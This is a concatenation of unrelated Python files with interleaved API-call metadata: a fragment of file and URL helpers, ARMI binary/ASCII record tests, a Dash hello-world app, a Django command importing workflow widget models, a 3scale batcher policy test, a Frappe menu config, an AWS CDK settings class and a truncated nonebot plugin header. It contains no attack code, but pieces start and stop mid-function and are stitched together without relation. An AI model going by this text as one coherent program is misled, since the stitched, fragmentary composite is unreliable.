count: int
"""
getcontext().prec = count
return (Decimal(num) / Decimal(1)).to_eng_string()
| [
"os.path.exists",
"decimal.getcontext",
"time.tzset",
"os.path.isdir",
"shutil.rmtree",
"urllib.request.urlopen",
"decimal.Decimal",
"os.remove"
] | [((285, 297), 'time.tzset', 'time.tzset', ([], {}), '()\n', (295, 297), False, 'import time\n'), ((1036, 1048), 'urllib.request.urlopen', 'urlopen', (['url'], {}), '(url)\n', (1043, 1048), False, 'from urllib.request import urlopen\n'), ((1827, 1859), 'os.path.isdir', 'os.path.isdir', (['path_or_file_name'], {}), '(path_or_file_name)\n', (1840, 1859), False, 'import os\n'), ((1512, 1544), 'os.path.exists', 'os.path.exists', (['target_file_name'], {}), '(target_file_name)\n', (1526, 1544), False, 'import os\n'), ((1701, 1734), 'os.path.exists', 'os.path.exists', (['path_or_file_name'], {}), '(path_or_file_name)\n', (1715, 1734), False, 'import os\n'), ((1883, 1915), 'shutil.rmtree', 'shutil.rmtree', (['path_or_file_name'], {}), '(path_or_file_name)\n', (1896, 1915), False, 'import shutil\n'), ((1949, 1977), 'os.remove', 'os.remove', (['path_or_file_name'], {}), '(path_or_file_name)\n', (1958, 1977), False, 'import os\n'), ((2128, 2140), 'decimal.getcontext', 'getcontext', ([], {}), '()\n', (2138, 2140), False, 'from decimal import getcontext, Decimal\n'), ((2166, 2178), 'decimal.Decimal', 'Decimal', (['num'], {}), '(num)\n', (2173, 2178), False, 'from decimal import getcontext, Decimal\n'), ((2181, 2191), 'decimal.Decimal', 'Decimal', (['(1)'], {}), '(1)\n', (2188, 2191), False, 'from decimal import getcontext, Decimal\n')] |
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import io
import six
from armi.nuclearDataIO import cccc
from armi.localization import exceptions
class CcccIOStreamTests(unittest.TestCase):
def test_initWithFileMode(self):
self.assertIsInstance(cccc.Stream("some-file", "rb"), cccc.Stream)
self.assertIsInstance(cccc.Stream("some-file", "wb"), cccc.Stream)
self.assertIsInstance(cccc.Stream("some-file", "r"), cccc.Stream)
self.assertIsInstance(cccc.Stream("some-file", "w"), cccc.Stream)
with self.assertRaises(exceptions.InvalidSelectionError):
cccc.Stream("some-file", "bacon")
class CcccBinaryRecordTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.writerClass = cccc.BinaryRecordWriter
cls.readerClass = cccc.BinaryRecordReader
def setUp(self):
self.streamCls = io.BytesIO
def test_writeAndReadSimpleIntegerRecord(self):
value = 42
stream = self.streamCls()
with self.writerClass(stream) as writer:
writer.rwInt(value)
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(writer.numBytes, reader.numBytes)
self.assertEqual(value, reader.rwInt(None))
self.assertEqual(4, writer.numBytes)
def test_writeAndReadSimpleFloatRecord(self):
stream = self.streamCls()
value = -33.322222
with self.writerClass(stream) as writer:
writer.rwFloat(value)
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(writer.numBytes, reader.numBytes)
self.assertAlmostEqual(value, reader.rwFloat(None), 5)
self.assertEqual(4, writer.numBytes)
def test_writeAndReadSimpleStringRecord(self):
stream = self.streamCls()
value = "Howdy, partner!"
size = 8 * 8
with self.writerClass(stream) as writer:
writer.rwString(value, size)
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(writer.numBytes, reader.numBytes)
self.assertEqual(value, reader.rwString(None, size))
self.assertEqual(size, writer.numBytes)
def test_notReadingAnEntireRecordRaisesException(self):
# I'm going to create a record with two pieces of data, and only read one...
stream = self.streamCls()
value = 99
with self.writerClass(stream) as writer:
writer.rwInt(value)
writer.rwInt(value)
self.assertEqual(8, writer.numBytes)
with self.assertRaises(exceptions.CcccRecordError):
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(value, reader.rwInt(None))
def test_readingBeyondRecordRaisesException(self):
# I'm going to create a record with two pieces of data, and only read one...
stream = self.streamCls()
value = 77
with self.writerClass(stream) as writer:
writer.rwInt(value)
self.assertEqual(4, writer.numBytes)
with self.assertRaises(exceptions.CcccRecordError):
with self.readerClass(self.streamCls(stream.getvalue())) as reader:
self.assertEqual(value, reader.rwInt(None))
self.assertEqual(4, reader.rwInt(None))
class CcccAsciiRecordTests(CcccBinaryRecordTests):
"""Runs the same tests as CcccBinaryRecordTests, but using ASCII readers and writers."""
@classmethod
def setUpClass(cls):
cls.writerClass = cccc.AsciiRecordWriter
cls.readerClass = cccc.AsciiRecordReader
def setUp(self):
self.streamCls = six.StringIO
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| [
"unittest.main",
"armi.nuclearDataIO.cccc.Stream"
] | [((4359, 4374), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4372, 4374), False, 'import unittest\n'), ((810, 840), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""rb"""'], {}), "('some-file', 'rb')\n", (821, 840), False, 'from armi.nuclearDataIO import cccc\n'), ((885, 915), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""wb"""'], {}), "('some-file', 'wb')\n", (896, 915), False, 'from armi.nuclearDataIO import cccc\n'), ((960, 989), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""r"""'], {}), "('some-file', 'r')\n", (971, 989), False, 'from armi.nuclearDataIO import cccc\n'), ((1034, 1063), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""w"""'], {}), "('some-file', 'w')\n", (1045, 1063), False, 'from armi.nuclearDataIO import cccc\n'), ((1156, 1189), 'armi.nuclearDataIO.cccc.Stream', 'cccc.Stream', (['"""some-file"""', '"""bacon"""'], {}), "('some-file', 'bacon')\n", (1167, 1189), False, 'from armi.nuclearDataIO import cccc\n')] |
from flask import Flask
from dash import Dash
import dash_core_components as dcc
import dash_html_components as html
# commonly used css stylesheet
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
# spinup flask server
server = Flask(__name__)
# spinup dash app on flask server
app = Dash(__name__, server=server, external_stylesheets=external_stylesheets)
# app html layout
app.layout = html.Div([
# classic hello world statement for proof of success
html.Div([
html.H1("Hello from Dash!"),
], style={'textAlign': "center"}),
])
if __name__ == '__main__':
# run server
app.run_server(debug=True)
| [
"dash_html_components.H1",
"dash.Dash",
"flask.Flask"
] | [((251, 266), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (256, 266), False, 'from flask import Flask\n'), ((308, 380), 'dash.Dash', 'Dash', (['__name__'], {'server': 'server', 'external_stylesheets': 'external_stylesheets'}), '(__name__, server=server, external_stylesheets=external_stylesheets)\n', (312, 380), False, 'from dash import Dash\n'), ((509, 536), 'dash_html_components.H1', 'html.H1', (['"""Hello from Dash!"""'], {}), "('Hello from Dash!')\n", (516, 536), True, 'import dash_html_components as html\n')] |
from django.core.management.base import BaseCommand, CommandError
from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption
from django.core import serializers
#dirty python2.6 fix
try:
from collections import Counter
except:
def Counter(list):
return set(list)
from optparse import make_option
class Command(BaseCommand):
args = 'file_name'
help = 'Imports all models from the file named "file_name". All models in the database which have the same uuid as imported models are updated. The folowing models are included in inport: AbstractWidget, Category, AbstractInput, AbstractOutput, and AbstractOption.'
option_list = BaseCommand.option_list + (
make_option('-r', '--replace',
action="store_true",
dest='replace',
default=False,
help='Completely replace whole widgets with the new one where UIDs match. Default behaviour merges widgets submodels (AbstractInputs, AbstractOutputs and AbstratcOptions)'
'based on their submodel\'s own UID. When using this option all widget\'s old submodels are deleted and completely replaced by new submodels.)'
),
)
def handle(self, *args, **options):
if (len(args)<1):
raise CommandError('Arguments "file_name" is required!')
try:
string = open(args[0], 'r').read()
except:
raise CommandError('There was a problem with opening given input file')
import_package_string(self.stdout.write, string, options['replace'], int(options['verbosity']))
self.stdout.write('Import procedure successfully finished.\n')
def import_package_string(writeFunc, string, replace, verbosity=1):
#get all objects from file and eliminate empty UID and check for UID duplicates
objsFileRaw = serializers.deserialize("json", string)
objsFile = list(objsFileRaw)
#order file models - essential for succesfull import
#TODO: following ordering could be done more efficiently
objsFile = order_objects_hier_top(objsFile)
objsFileNoUid = [x for x in objsFile if len(x.object.uid) == 0]
objsFile = [x for x in objsFile if len(x.object.uid) != 0]
if len(objsFileNoUid)>0:
writeFunc('File contains %i model(s) without UID field set. Those will not be imported! If you wish to'
' assign them random UIDs then use the "-n" option when exporting models with the "export_package"'
' command. Afterwards, you will be able to import them.\n' % len(objsFileNoUid))
if len(Counter([x.object.uid for x in objsFile])) != len(objsFile):
a = sorted([x.object.uid for x in objsFile])
for x in a:
print(x)
raise CommandError('Input process terminated without any changes to the database. There were multiple equal '
'UIDs defined on different models in the given input file. The input procedure can not continue '
'from safety reasons. Please resolve manually!')
#divide new objects by type
wids = [x for x in objsFile if isinstance(x.object, AbstractWidget)]
inps = [x for x in objsFile if isinstance(x.object, AbstractInput)]
outs = [x for x in objsFile if isinstance(x.object, AbstractOutput)]
opts = [x for x in objsFile if isinstance(x.object, AbstractOption)]
cats = [x for x in objsFile if isinstance(x.object, Category)]
#ouput statistics about file
if verbosity>0:
writeFunc('Import file contains:\n')
writeFunc(' % 4i AbstractWidget(s)\n' % len(wids))
writeFunc(' % 4i AbstractInput(s)\n' % len(inps))
writeFunc(' % 4i AbstractOutput(s)\n' % len(outs))
writeFunc(' % 4i AbstractOption(s)\n' % len(opts))
writeFunc(' % 4i Category(s)\n' % len(cats))
#get all objects from database
objsDb = []
objsDb.extend(AbstractWidget.objects.all())
objsDb.extend(AbstractInput.objects.all())
objsDb.extend(AbstractOutput.objects.all())
objsDb.extend(AbstractOption.objects.all())
objsDb.extend(Category.objects.all())
#check for DB UID duplicates
objsdbDict = dict((x.uid,x) for x in objsDb if len(x.uid) != 0)
if len([x for x in objsDb if len(x.uid) != 0]) != len(objsdbDict):
error_txt= 'Input process terminated without any changes to the database. There were multiple equal ' \
'UIDs defined on different models in the database. The input procedure can not continue ' \
'from safety reasons. Please resolve manually! UIDs with multiple models:'
#count objects per uid
from collections import defaultdict
objs_per_uid=defaultdict(list)
for x in objsDb:
if x.uid:
objs_per_uid[x.uid].append(x)
for uid,objs in list(objs_per_uid.items()):
if len(objs)>1:
error_txt+="\n\nUID: "+str(uid)+"\nobjects: "+str(objs)
raise CommandError(error_txt)
#create new to existing id mapping and check for type match
idMappingDict = dict()
for objFile in objsFile:
if objFile.object.uid in objsdbDict:
objDb = objsdbDict[objFile.object.uid]
objFileTypeId = str(type(objFile.object))+':'+str(objFile.object.id)
objDbTypeId = str(type(objDb))+':'+str(objDb.id)
if type(objFile.object) == type(objsdbDict[objFile.object.uid]):
idMappingDict[objFileTypeId] = objDb.id
else:
raise CommandError('Input process terminated without any changes to the database. Two models match by uid but not '
'by type:\n - from file: id: %s uid: %s\n - from database: id: %s uid: %s\n Please resolve manually!'%
(objFileTypeId, objFile.object.uid, objDbTypeId, objsdbDict[objFile.object.uid].uid))
#ouput statistics about database
if verbosity>0:
writeFunc('Current database contains %i models,\n' % len(objsDb))
writeFunc(' of which %i models have UID set,\n' % len(objsdbDict))
writeFunc(' of which %i models match with the imported models and will be updated.\n' % len(idMappingDict))
#prepare statistics
statDict = dict([('old:'+str(t),len(t.objects.all())) for t in [AbstractWidget, AbstractInput, AbstractOutput, AbstractOption, Category]])
for modelType in [AbstractWidget, AbstractInput, AbstractOutput, AbstractOption, Category]:
for operation in ['mod','add','del']:
statDict[operation+':'+str(modelType)]=0
#save models to the database - update the ids for the matching models and remove the ids (to get a new one) for the non matching models
#the import needs to be done in specific order! Hierarhically top down - all superiror objects needs to be imported prior importing sub object
#order: parent categories>sub categories>widgets>inputs>outputs>options
if verbosity>0:
writeFunc('Merging file and database models ...' + ('\n' if verbosity>1 else ''))
importedUids = dict()
for objFile in objsFile:
objFileTypeId = str(type(objFile.object))+':'+str(objFile.object.id)
if verbosity>1:
objFileTypeIdStr = objFileTypeId.replace(":",":"+" "*(47-len(objFileTypeId)))
if objFileTypeId in idMappingDict:
writeFunc('updating: ' + objFileTypeIdStr + ' => <db_id>: ' + str(idMappingDict[objFileTypeId]) + '\n')
else:
writeFunc(' adding: ' + objFileTypeIdStr + '\n')
#parent category needs to be already imported and added to idMappingDict
if isinstance(objFile.object, Category):
if not objFile.object.parent_id is None:
objId = idMappingDict[str(Category)+':'+str(objFile.object.parent_id)]
if verbosity>2:
writeFunc('% 52s'%'rewiring parent category from <file_id>:' + '% 5i'%objFile.object.parent_id + ' => <db_id>: %i\n'%objId)
objFile.object.parent = Category.objects.get(id=objId)
#widget's category needs to be already imported and added to idMappingDict
if isinstance(objFile.object, AbstractWidget):
objId = idMappingDict[str(Category) + ':' + str(objFile.object.category_id)]
if verbosity>2:
writeFunc('% 52s'%'rewiring widget\'s category from <file_id>:' + '% 5i'%objFile.object.category_id + ' => <db_id>: %i\n'%objId)
objFile.object.category = Category.objects.get(id=objId)
#input/output's widget needs to be already imported and added to idMappingDict
if isinstance(objFile.object, AbstractInput) or isinstance(objFile.object, AbstractOutput):
objId = idMappingDict[str(AbstractWidget) + ':' + str(objFile.object.widget_id)]
if verbosity>2:
writeFunc('% 52s'%'rewiring containing widget from <file_id>:' + '% 5i'%objFile.object.widget_id + ' => <db_id>: %i\n'%objId)
objFile.object.widget = AbstractWidget.objects.get(id=objId)
#options's input needs to be already imported and added to idMappingDict
if isinstance(objFile.object, AbstractOption):
objId = idMappingDict[str(AbstractInput) + ':' + str(objFile.object.abstract_input_id)]
if verbosity>2:
writeFunc('% 52s'%'rewiring containing input from <file_id>:' + '% 5i'%objFile.object.abstract_input_id + ' => <db_id>: %i\n'%objId)
objFile.object.abstract_input = AbstractInput.objects.get(id=objId)
#update existing model or add a new one
if objFileTypeId in idMappingDict:
#there is already an existing model with same uid
statDict['mod:'+str(type(objFile.object))]+=1
objFile.object.id = idMappingDict[objFileTypeId]
else:
#there is no model jet, add it
statDict['add:'+str(type(objFile.object))]+=1
objFile.object.id = None
objFile.save() #actual saving to the DB, if object is new then id is assigend at this point
#dictionary bookkeeping
idMappingDict[objFileTypeId] = objFile.object.id
importedUids[objFile.object.uid]=True
if verbosity>0:
writeFunc(' done.\n')
if replace:
if verbosity>0:
writeFunc('Removing unnecessary inputs/options/outputs...')
for wid in [wid for wid in objsFile if isinstance(wid.object, AbstractWidget)]:
for inp in AbstractInput.objects.filter(widget = wid.object.id):
for opt in AbstractOption.objects.filter(abstract_input = inp.id):
if opt.uid not in importedUids:
statDict['del:'+str(AbstractOption)]+=1
opt.delete()
if inp.uid not in importedUids:
statDict['del:'+str(AbstractInput)]+=1
inp.delete()
for out in AbstractOutput.objects.filter(widget = wid.object.id):
if out.uid not in importedUids:
statDict['del:'+str(AbstractOutput)]+=1
out.delete()
if verbosity>0:
writeFunc(' done.\n')
#update and output statistics
if verbosity>0:
statDict = dict(list(statDict.items()) + list(dict([('new:'+str(t),len(t.objects.all())) for t in [AbstractWidget, AbstractInput, AbstractOutput, AbstractOption, Category]]).items()))
writeFunc('Database models count statistics: pre-import + ( added | modified | deleted ) = after-import\n')
for t in [AbstractWidget, AbstractInput, AbstractOutput, AbstractOption, Category]:
writeFunc(' % 15s: % 5i + (% 4i | % 4i | % 4i ) = % 5i\n' %
(t.__name__,
statDict['old:'+str(t)],
statDict['add:'+str(t)],
statDict['mod:'+str(t)],
statDict['del:'+str(t)],
statDict['new:'+str(t)]))
def order_objects_hier_top(objsFile):
objsFileOrdered = []
for topCat in [x for x in objsFile if (isinstance(x.object, Category) and x.object.parent_id is None)]:
objsFileOrdered.extend(order_objects_hier(topCat, objsFile))
return objsFileOrdered
def order_objects_hier(cat, objsFile):
assert isinstance(cat.object, Category)
assert isinstance(objsFile, list)
objsFileOrdered = []
objsFileOrdered.append(cat)
for wid in [x for x in objsFile if (isinstance(x.object, AbstractWidget) and x.object.category_id == cat.object.id)]:
objsFileOrdered.append(wid)
for inp in [x for x in objsFile if (isinstance(x.object, AbstractInput) and x.object.widget_id == wid.object.id)]:
objsFileOrdered.append(inp)
for opt in [x for x in objsFile if (isinstance(x.object, AbstractOption) and x.object.abstract_input_id == inp.object.id)]:
objsFileOrdered.append(opt)
for outp in [x for x in objsFile if (isinstance(x.object, AbstractOutput) and x.object.widget_id == wid.object.id)]:
objsFileOrdered.append(outp)
for subCat in [x for x in objsFile if (isinstance(x.object, Category) and x.object.parent_id == cat.object.id)]:
objsFileOrdered.extend(order_objects_hier(subCat,objsFile))
return objsFileOrdered | [
"workflows.models.AbstractInput.objects.filter",
"django.core.serializers.deserialize",
"workflows.models.AbstractWidget.objects.all",
"workflows.models.AbstractOutput.objects.all",
"workflows.models.AbstractOption.objects.all",
"collections.Counter",
"workflows.models.AbstractInput.objects.get",
"collections.defaultdict",
"optparse.make_option",
"django.core.management.base.CommandError",
"workflows.models.Category.objects.get",
"workflows.models.AbstractWidget.objects.get",
"workflows.models.Category.objects.all",
"workflows.models.AbstractOption.objects.filter",
"workflows.models.AbstractInput.objects.all",
"workflows.models.AbstractOutput.objects.filter"
] | [((1863, 1902), 'django.core.serializers.deserialize', 'serializers.deserialize', (['"""json"""', 'string'], {}), "('json', string)\n", (1886, 1902), False, 'from django.core import serializers\n'), ((2773, 3027), 'django.core.management.base.CommandError', 'CommandError', (['"""Input process terminated without any changes to the database. There were multiple equal UIDs defined on different models in the given input file. The input procedure can not continue from safety reasons. Please resolve manually!"""'], {}), "(\n 'Input process terminated without any changes to the database. There were multiple equal UIDs defined on different models in the given input file. The input procedure can not continue from safety reasons. Please resolve manually!'\n )\n", (2785, 3027), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((3941, 3969), 'workflows.models.AbstractWidget.objects.all', 'AbstractWidget.objects.all', ([], {}), '()\n', (3967, 3969), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((3989, 4016), 'workflows.models.AbstractInput.objects.all', 'AbstractInput.objects.all', ([], {}), '()\n', (4014, 4016), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((4036, 4064), 'workflows.models.AbstractOutput.objects.all', 'AbstractOutput.objects.all', ([], {}), '()\n', (4062, 4064), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((4084, 4112), 'workflows.models.AbstractOption.objects.all', 'AbstractOption.objects.all', ([], {}), '()\n', (4110, 4112), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((4132, 4154), 'workflows.models.Category.objects.all', 'Category.objects.all', ([], {}), '()\n', (4152, 4154), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((4746, 4763), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (4757, 4763), False, 'from collections import defaultdict\n'), ((5028, 5051), 'django.core.management.base.CommandError', 'CommandError', (['error_txt'], {}), '(error_txt)\n', (5040, 5051), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((733, 1142), 'optparse.make_option', 'make_option', (['"""-r"""', '"""--replace"""'], {'action': '"""store_true"""', 'dest': '"""replace"""', 'default': '(False)', 'help': '"""Completely replace whole widgets with the new one where UIDs match. Default behaviour merges widgets submodels (AbstractInputs, AbstractOutputs and AbstratcOptions)based on their submodel\'s own UID. When using this option all widget\'s old submodels are deleted and completely replaced by new submodels.)"""'}), '(\'-r\', \'--replace\', action=\'store_true\', dest=\'replace\', default\n =False, help=\n "Completely replace whole widgets with the new one where UIDs match. Default behaviour merges widgets submodels (AbstractInputs, AbstractOutputs and AbstratcOptions)based on their submodel\'s own UID. When using this option all widget\'s old submodels are deleted and completely replaced by new submodels.)"\n )\n', (744, 1142), False, 'from optparse import make_option\n'), ((1303, 1353), 'django.core.management.base.CommandError', 'CommandError', (['"""Arguments "file_name" is required!"""'], {}), '(\'Arguments "file_name" is required!\')\n', (1315, 1353), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((2604, 2645), 'collections.Counter', 'Counter', (['[x.object.uid for x in objsFile]'], {}), '([x.object.uid for x in objsFile])\n', (2611, 2645), False, 'from collections import Counter\n'), ((8584, 8614), 'workflows.models.Category.objects.get', 'Category.objects.get', ([], {'id': 'objId'}), '(id=objId)\n', (8604, 8614), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((9102, 9138), 'workflows.models.AbstractWidget.objects.get', 'AbstractWidget.objects.get', ([], {'id': 'objId'}), '(id=objId)\n', (9128, 9138), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((9597, 9632), 'workflows.models.AbstractInput.objects.get', 'AbstractInput.objects.get', ([], {'id': 'objId'}), '(id=objId)\n', (9622, 9632), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((10570, 10620), 'workflows.models.AbstractInput.objects.filter', 'AbstractInput.objects.filter', ([], {'widget': 'wid.object.id'}), '(widget=wid.object.id)\n', (10598, 10620), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((11023, 11074), 'workflows.models.AbstractOutput.objects.filter', 'AbstractOutput.objects.filter', ([], {'widget': 'wid.object.id'}), '(widget=wid.object.id)\n', (11052, 11074), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((1449, 1514), 'django.core.management.base.CommandError', 'CommandError', (['"""There was a problem with opening given input file"""'], {}), "('There was a problem with opening given input file')\n", (1461, 1514), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((5584, 5905), 'django.core.management.base.CommandError', 'CommandError', (['("""Input process terminated without any changes to the database. Two models match by uid but not by type:\n - from file: id: %s uid: %s\n - from database: id: %s uid: %s\n Please resolve manually!"""\n % (objFileTypeId, objFile.object.uid, objDbTypeId, objsdbDict[objFile.\n object.uid].uid))'], {}), '(\n """Input process terminated without any changes to the database. Two models match by uid but not by type:\n - from file: id: %s uid: %s\n - from database: id: %s uid: %s\n Please resolve manually!"""\n % (objFileTypeId, objFile.object.uid, objDbTypeId, objsdbDict[objFile.\n object.uid].uid))\n', (5596, 5905), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((8114, 8144), 'workflows.models.Category.objects.get', 'Category.objects.get', ([], {'id': 'objId'}), '(id=objId)\n', (8134, 8144), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((10651, 10703), 'workflows.models.AbstractOption.objects.filter', 'AbstractOption.objects.filter', ([], {'abstract_input': 'inp.id'}), '(abstract_input=inp.id)\n', (10680, 10703), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n')] |
"""
Test checks that batcher policy is working with a metric containing a non-alphanumeric
character in the name
"""
from time import sleep
import pytest
from packaging.version import Version # noqa # pylint: disable=unused-import
from testsuite import TESTED_VERSION, rawobj # noqa # pylint: disable=unused-import
pytestmark = [
pytest.mark.skipif("TESTED_VERSION < Version('2.10')"),
pytest.mark.issue("https://issues.redhat.com/browse/THREESCALE-4913")]
BATCH_REPORT_SECONDS = 50
@pytest.fixture(scope="module")
def policy_settings():
"""Set policy settings"""
return rawobj.PolicyConfig("3scale_batcher", {"batch_report_seconds": BATCH_REPORT_SECONDS})
@pytest.fixture(scope="module")
def metric_name():
"""
Name of the metric containing non alphanumerical character ('/')
"""
return "m/1"
@pytest.fixture(scope="module")
def service(service, metric_name):
"""
Creates the metric with the metric name and a mapping rule for that metric
"""
proxy = service.proxy.list()
metric = service.metrics.create(rawobj.Metric(metric_name))
# delete implicit '/' rule
proxy.mapping_rules.delete(proxy.mapping_rules.list()[0]["id"])
service.proxy.list().mapping_rules.create(rawobj.Mapping(metric, "/", "GET"))
service.proxy.list().update()
return service
def test_batcher_policy_append(api_client, application, metric_name):
"""
Test if the reported numbers of usages are correct
"""
client = api_client()
analytics = application.threescale_client.analytics
usage_before = analytics.list_by_service(
application["service_id"], metric_name=metric_name)["total"]
for i in range(3):
response = client.get("/anything")
assert response.status_code == 200, f"{i}. iteration was unsuccessful"
sleep(BATCH_REPORT_SECONDS + 1)
usage_after = analytics.list_by_service(application["service_id"],
metric_name=metric_name)["total"]
assert usage_after == usage_before + 3
| [
"testsuite.rawobj.Mapping",
"testsuite.rawobj.Metric",
"time.sleep",
"testsuite.rawobj.PolicyConfig",
"pytest.mark.skipif",
"pytest.fixture",
"pytest.mark.issue"
] | [((501, 531), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (515, 531), False, 'import pytest\n'), ((685, 715), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (699, 715), False, 'import pytest\n'), ((840, 870), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (854, 870), False, 'import pytest\n'), ((339, 393), 'pytest.mark.skipif', 'pytest.mark.skipif', (['"""TESTED_VERSION < Version(\'2.10\')"""'], {}), '("TESTED_VERSION < Version(\'2.10\')")\n', (357, 393), False, 'import pytest\n'), ((399, 468), 'pytest.mark.issue', 'pytest.mark.issue', (['"""https://issues.redhat.com/browse/THREESCALE-4913"""'], {}), "('https://issues.redhat.com/browse/THREESCALE-4913')\n", (416, 468), False, 'import pytest\n'), ((596, 685), 'testsuite.rawobj.PolicyConfig', 'rawobj.PolicyConfig', (['"""3scale_batcher"""', "{'batch_report_seconds': BATCH_REPORT_SECONDS}"], {}), "('3scale_batcher', {'batch_report_seconds':\n BATCH_REPORT_SECONDS})\n", (615, 685), False, 'from testsuite import TESTED_VERSION, rawobj\n'), ((1827, 1858), 'time.sleep', 'sleep', (['(BATCH_REPORT_SECONDS + 1)'], {}), '(BATCH_REPORT_SECONDS + 1)\n', (1832, 1858), False, 'from time import sleep\n'), ((1071, 1097), 'testsuite.rawobj.Metric', 'rawobj.Metric', (['metric_name'], {}), '(metric_name)\n', (1084, 1097), False, 'from testsuite import TESTED_VERSION, rawobj\n'), ((1246, 1280), 'testsuite.rawobj.Mapping', 'rawobj.Mapping', (['metric', '"""/"""', '"""GET"""'], {}), "(metric, '/', 'GET')\n", (1260, 1280), False, 'from testsuite import TESTED_VERSION, rawobj\n')] |
from __future__ import unicode_literals
from frappe import _
def get_data():
return [
{
"label": _("Invoices"),
"icon": "fa fa-star",
"items": [
{
"type": "doctype",
"name": "Ticket Invoice",
"description": _("Ticket Invoice")
},
{
"type": "doctype",
"name": "Tour Invoice",
"description": _("Tour Invoice")
},
{
"type": "doctype",
"name": "Proforma Ticket Invoice",
"description": _("Proforma Ticket Invoice")
},
{
"type": "doctype",
"name": "Proforma Tour Invoice",
"description": _("Proforma Tour Invoice")
}
]
},
{
"label": _("Setup"),
"icon": "fa fa-star",
"items": [
{
"type": "doctype",
"name": "Carrier Settings",
"description": _("Carrier Settings")
}
]
},
{
"label": _("Report"),
"icon": "fa fa-star",
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Carrier Tickets",
"doctype": "Ticket Invoice"
},
{
"type": "report",
"is_query_report": True,
"name": "Ticket and Tour Invoice",
"doctype": "Ticket Invoice"
},
]
}
]
| [
"frappe._"
] | [((104, 117), 'frappe._', '_', (['"""Invoices"""'], {}), "('Invoices')\n", (105, 117), False, 'from frappe import _\n'), ((643, 653), 'frappe._', '_', (['"""Setup"""'], {}), "('Setup')\n", (644, 653), False, 'from frappe import _\n'), ((831, 842), 'frappe._', '_', (['"""Report"""'], {}), "('Report')\n", (832, 842), False, 'from frappe import _\n'), ((239, 258), 'frappe._', '_', (['"""Ticket Invoice"""'], {}), "('Ticket Invoice')\n", (240, 258), False, 'from frappe import _\n'), ((345, 362), 'frappe._', '_', (['"""Tour Invoice"""'], {}), "('Tour Invoice')\n", (346, 362), False, 'from frappe import _\n'), ((460, 488), 'frappe._', '_', (['"""Proforma Ticket Invoice"""'], {}), "('Proforma Ticket Invoice')\n", (461, 488), False, 'from frappe import _\n'), ((584, 610), 'frappe._', '_', (['"""Proforma Tour Invoice"""'], {}), "('Proforma Tour Invoice')\n", (585, 610), False, 'from frappe import _\n'), ((777, 798), 'frappe._', '_', (['"""Carrier Settings"""'], {}), "('Carrier Settings')\n", (778, 798), False, 'from frappe import _\n')] |
import os
import aws_cdk as cdk
from pydantic import BaseSettings
class Config(BaseSettings):
# Project
account_id: str = ''
project_name: str = 'aws-cdk-demo'
region: str = 'ap-northeast-1'
env: str = 'dev' if not os.getenv('ENV') else os.getenv('ENV')
stack_env = cdk.Environment(account=account_id, region=region)
config = Config()
| [
"os.getenv",
"aws_cdk.Environment"
] | [((305, 355), 'aws_cdk.Environment', 'cdk.Environment', ([], {'account': 'account_id', 'region': 'region'}), '(account=account_id, region=region)\n', (320, 355), True, 'import aws_cdk as cdk\n'), ((271, 287), 'os.getenv', 'os.getenv', (['"""ENV"""'], {}), "('ENV')\n", (280, 287), False, 'import os\n'), ((249, 265), 'os.getenv', 'os.getenv', (['"""ENV"""'], {}), "('ENV')\n", (258, 265), False, 'import os\n')] |
import random
from nonebot import on_message
from nonebot.adapters.cqhttp import Bot, GroupMessageEvent, MessageSegment
from nonebot.adapters.cqhttp.permission import GROUP
from nonebot.plugin import export
from . import data_source as source
export = export()
